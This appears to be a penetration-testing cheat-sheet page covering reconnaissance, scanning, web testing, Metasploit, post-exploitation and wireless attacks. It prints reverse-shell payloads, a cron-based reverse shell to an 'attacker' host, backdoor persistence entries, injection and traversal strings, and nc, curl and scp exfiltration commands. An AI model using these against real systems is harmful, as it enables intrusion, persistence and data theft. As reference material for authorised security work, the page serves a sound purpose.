PK Rain Technology

Your comprehensive reference for ethical hacking, penetration testing, and cybersecurity commands

⚠️ Legal Disclaimer

This website is for educational purposes only. All techniques and tools should only be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and punishable by law.

🔍 Reconnaissance & Information Gathering

Passive Reconnaissance

WHOIS Lookup

Gather domain registration information, including registrar details, creation dates, and contact information.

whois example.com
whois -h whois.internic.net example.com
whois 192.168.1.1

Example Output:

Domain Name: EXAMPLE.COM
Registry Domain ID: 2336799_DOMAIN_COM-VRSN
Registrar: IANA Reserved Domain

DNS Enumeration

Discover DNS records, subdomains, and network infrastructure information.

dig example.com
dig @8.8.8.8 example.com MX
dig example.com NS
nslookup example.com
host -a example.com
fierce -dns example.com

Google Dorking

Use advanced Google search operators to find sensitive information and potential security vulnerabilities.

site:example.com filetype:pdf
site:example.com inurl:admin
intitle:"index of" site:example.com
inurl:"/admin/login.php"
filetype:sql "password"

Active Reconnaissance

Network Discovery

Identify live hosts and network topology using various scanning techniques.

nmap -sn 192.168.1.0/24
fping -a -g 192.168.1.0/24
arp-scan -l
netdiscover -r 192.168.1.0/24

🌐 Network Scanning

Port Scanning with Nmap

Basic Scans

Fundamental port scanning techniques for discovering open ports and services.

nmap target
nmap -sS target            # TCP SYN scan
nmap -sU target            # UDP scan
nmap -sT target            # TCP connect scan
nmap -sA target            # ACK scan

Advanced Scans

Comprehensive scanning with service detection, OS fingerprinting, and vulnerability assessment.

nmap -A target                    # Aggressive scan
nmap -sC -sV target              # Default scripts + version detection
nmap -p- target                  # Scan all ports
nmap --top-ports 1000 target     # Scan top 1000 ports
nmap --script vuln target        # Vulnerability scripts

Stealth and Evasion

Techniques to avoid detection by firewalls and intrusion detection systems.

nmap -f target                   # Fragment packets
nmap -D RND:10 target           # Decoy scan
nmap --source-port 53 target    # Source port manipulation
nmap -T1 target                 # Slow scan timing

🌍 Web Application Testing

Directory Enumeration

Discover hidden directories, files, and endpoints in web applications.

gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
dirb http://target
dirsearch -u http://target -e php,html,js
ffuf -w wordlist.txt -u http://target/FUZZ

SQL Injection Testing

Automated SQL injection detection and exploitation using SQLMap.

sqlmap -u "http://target/page.php?id=1"
sqlmap -u target --dbs
sqlmap -u target -D database --tables
sqlmap -u target -D database -T table --columns
sqlmap -u target -D database -T table -C column --dump

Web Vulnerability Scanners

Comprehensive web application security assessment tools.

nikto -h http://target
nikto -h target -p 80,443,8080
wpscan --url http://target
whatweb http://target

💻 System Enumeration

Linux System Information

Gather detailed information about Linux systems for privilege escalation and lateral movement.

uname -a                    # System information
whoami                      # Current user
id                         # User ID and groups
cat /etc/passwd            # User accounts
cat /etc/shadow            # Password hashes
ps aux                     # Running processes
netstat -antup             # Network connections

Windows System Information

Essential Windows enumeration commands for post-exploitation activities.

systeminfo                  # System information
whoami /all                # Current user privileges
net user                   # List users
net localgroup administrators  # Admin group members
tasklist                   # Running processes
netstat -an                # Network connections

File System Exploration

Commands to explore file systems and find sensitive information or privilege escalation vectors.

# Linux
find / -perm -4000 2>/dev/null     # Find SUID files
find / -writable 2>/dev/null       # Find writable files
locate *.conf                      # Find config files

# Windows
dir C:\ /s /b | findstr password   # Search for password files
icacls C:\                         # Check permissions

🔓 Vulnerability Assessment

OpenVAS

Open-source vulnerability scanner for comprehensive network security assessment.

openvas-setup              # Initial setup
openvas-start              # Start services
openvas-stop               # Stop services
openvas-check-setup        # Verify installation

Nessus

Professional vulnerability scanner with extensive plugin database.

/opt/nessus/sbin/nessuscli
nessuscli scan --list
nessuscli scan --stop
nessuscli update

Manual Vulnerability Testing

Manual testing techniques for specific vulnerabilities and security misconfigurations.

# Test for common vulnerabilities
curl -H "User-Agent: () { :; }; echo vulnerable" http://target/  # Shellshock
nmap --script smb-vuln-ms17-010 target                          # EternalBlue
testssl.sh target                                                # SSL/TLS testing

⚡ Exploitation

Metasploit Framework

The most popular exploitation framework for penetration testing and vulnerability research.

msfconsole                           # Start Metasploit
search exploit                       # Search for exploits
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set LHOST attacker_ip
exploit

Payload Generation

Create custom payloads for various platforms and delivery methods.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe > payload.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker LPORT=4444 -f elf > payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f php > payload.php

Manual Exploitation

Manual exploitation techniques and proof-of-concept attacks.

# Buffer overflow testing  
python -c "print 'A' * 100"

# Command injection
; cat /etc/passwd
| whoami
`id`

# Path traversal
../../../etc/passwd
....//....//....//etc/passwd

🎯 Post-Exploitation

Privilege Escalation

Techniques to escalate privileges on compromised systems.

# Linux privilege escalation
sudo -l                           # Check sudo permissions
cat /etc/crontab                  # Check cron jobs
find / -perm -4000 2>/dev/null    # Find SUID binaries

# Windows privilege escalation  
whoami /priv                      # Check privileges
net localgroup administrators     # Check admin group
wmic service list brief           # List services

Persistence

Maintain access to compromised systems through various persistence mechanisms.

# Linux persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'" | crontab -
echo "ssh-rsa AAAAB3... attacker@kali" >> ~/.ssh/authorized_keys

# Windows persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
schtasks /create /sc minute /mo 1 /tn backdoor /tr C:\backdoor.exe

Data Exfiltration

Methods to extract sensitive data from compromised systems.

# Data transfer methods
scp file.txt user@attacker:/tmp/
nc -w 3 attacker 4444 < file.txt
curl -X POST -d @file.txt http://attacker/upload
python -m SimpleHTTPServer 8000  # Host files for download

📡 Wireless Network Testing

WiFi Reconnaissance

Discover and analyze wireless networks in the vicinity.

iwconfig                     # Show wireless interfaces
iwlist scan                  # Scan for networks
airodump-ng wlan0mon        # Monitor mode scanning
wash -i wlan0mon            # WPS-enabled networks

WPA/WPA2 Attacks

Attack WPA/WPA2 encrypted wireless networks using various techniques.

aircrack-ng -w wordlist.txt capture.cap
hashcat -m 2500 capture.hccapx wordlist.txt
airmon-ng start wlan0
aireplay-ng -0 5 -a [BSSID] wlan0mon

WEP Attacks

Attack legacy WEP encryption (rarely used but still encountered).

aircrack-ng -b [BSSID] capture.cap
aireplay-ng -1 0 -a [BSSID] wlan0mon
aireplay-ng -3 -b [BSSID] wlan0mon

🔬 Digital Forensics

Memory Analysis

Analyze memory dumps for evidence and artifacts using Volatility framework.

volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=profile pslist
volatility -f memory.dump --profile=profile netscan
volatility -f memory.dump --profile=profile filescan

Network Forensics

Analyze network traffic and packet captures for security incidents.

tshark -r capture.pcap
tshark -r capture.pcap -Y "http"
tcpdump -r capture.pcap
wireshark capture.pcap

File System Analysis

Examine file systems and recover deleted files for forensic investigation.

autopsy                      # GUI tool
sleuthkit                    # Command line tools
foremost -i disk.img         # File carving
strings disk.img | grep password